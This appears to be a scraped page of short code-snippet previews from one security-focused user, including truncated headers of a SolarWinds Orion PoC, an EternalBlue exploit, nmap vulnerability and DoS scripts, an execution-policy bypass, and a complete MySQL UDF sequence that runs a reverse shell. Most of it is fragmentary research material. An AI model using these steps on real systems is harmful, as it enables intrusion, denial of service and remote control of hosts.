shaheemirza

# CVE-2020-10148  (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha 
# (C) 2020 0xSha.io 

# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464

# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules

shaheemirza

Keybase proof

I hereby claim:

• I am shaheemirza on github.
• I am shaheemirza (https://keybase.io/shaheemirza) on keybase.
• I have a public key ASBTxO-YmsRzRF9C1e7DfUKX7EMIPJui-OwN0ml7-w7DXgo

To claim this, I am signing this object:

shaheemirza

import os
import sys
import time
import struct
import select
import binascii

import bluetooth
from bluetooth import _bluetooth as bt

shaheemirza

"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } 


NLNOTES.EXE  /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } 


Hashes of each binary (prepare for onslaught of md5 naysayers):
Notes.exe — 8f633ef1e1147637c25dd917909cd361
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126

shaheemirza

#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

shaheemirza

local smb = require "smb"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"

description = [[
Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code
 execution vulnerability (ms17-010).

The script connects to the $IPC tree, executes a transaction on FID 0 and

shaheemirza

description=[[
CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL.  
Warning: This WILL cause DoS on vulnerable mysql machines.
Thanks: SECWORKS, hackers.mu team.
]]

---
--@usage nmap -sU -p <portnum> --script mysql-vuln-cve2017-3599 --script-args mysql-vuln-cve2017-3599.ports=<ports> <target>
--@output
--PORT     STATE SERVICE

shaheemirza

#!/bin/bash
# Sign a file with a private key using OpenSSL
# Encode the signature in Base64 format
#
# Usage: sign <file> <private_key>
#
# NOTE: to generate a public/private key use the following commands:
#
# openssl genrsa -aes128 -passout pass:<passphrase> -out private.pem 2048
# openssl rsa -in private.pem -passin pass:<passphrase> -pubout -out public.pem

shaheemirza

# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)

mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');

shaheemirza

openssl rsa -in ~/.ssh/id_rsa -outform pem > id_rsa.pem
chmod 700 id_rsa.pem